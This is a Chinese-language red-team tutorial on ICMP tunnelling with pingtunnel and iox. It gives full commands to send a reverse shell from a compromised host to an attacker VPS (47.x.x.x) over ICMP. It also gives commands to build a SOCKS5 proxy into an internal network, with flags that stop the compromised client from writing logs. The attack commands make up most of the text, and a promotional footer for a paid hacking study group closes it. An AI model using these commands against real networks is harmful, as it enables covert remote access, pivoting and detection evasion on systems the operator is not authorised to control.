icmp 隧道代理搭建

本文来自“白帽子社区知识星球”

更多红队题材或其他技术内容可见知识星球“红队专栏”

icmpshPingTunnelicmptunnelpowershell icmp

实验1 利用icmp协议反弹shell:

首先在vps 执行

echo 1 >/proc/sys/net/ipv4/icmp_echo_ignore_all

然后下载pingtunnel 作为Server 端，key代表了密钥

sudo ./pingtunnel -type server -key 457864

在被控主机Client执行

./pingtunnel -type client -l :4455 -s 47.x.x.x -t 47.x.x.x:8888 -tcp 1 -key 457864

以上意思就是客户端监听本地的4455 端口，指定服务端IP为47.x.x.x，然后将本地端口4455 的流量转发

到47.x.x.x的8888 端口。

在Server 使用nc 监听8888 端口

Client 执行反弹shell的命令，反弹到本地的4455 端口

此时Server 获取到nc的shell

可以看到此时的流量均为icmp

实验2 使用 iox + pingtunnel 搭建隧道

首先在服务端运行一下命令

./pingtunnel -type server -key 457864 //开启pingtunnel 服务端./iox proxy -l 8898 -l 1080 //开启iox，将8898 收到的请求转发到1080 端口

在Client执行以下命令，注意需要增加noprint 和nolog命令，避免在客户端产生大量的日志信息

./pingtunnel -type client -l 127.0.0.1:9999 -s 47.x.x.x -t 47.x.x.x:8898 -sock5 -1 -noprint 1 -nolog 1 -key 457864./iox proxy -r 127.0.0.1:9999 //将代理流量转发到9999

然后再本地配置代理 socks5://47.x.x.x:1080 然后就可以访问内网的IP

如果觉得本文不错的话，欢迎加入知识星球，星球内部设立了多个技术版块，目前涵盖“WEB安全”、“内网渗透”、“CTF技术区”、“漏洞分析”、“工具分享”五大类，还可以与嘉宾大佬们接触，在线答疑、互相探讨。

▼扫码关注白帽子社区公众号&加入知识星球▼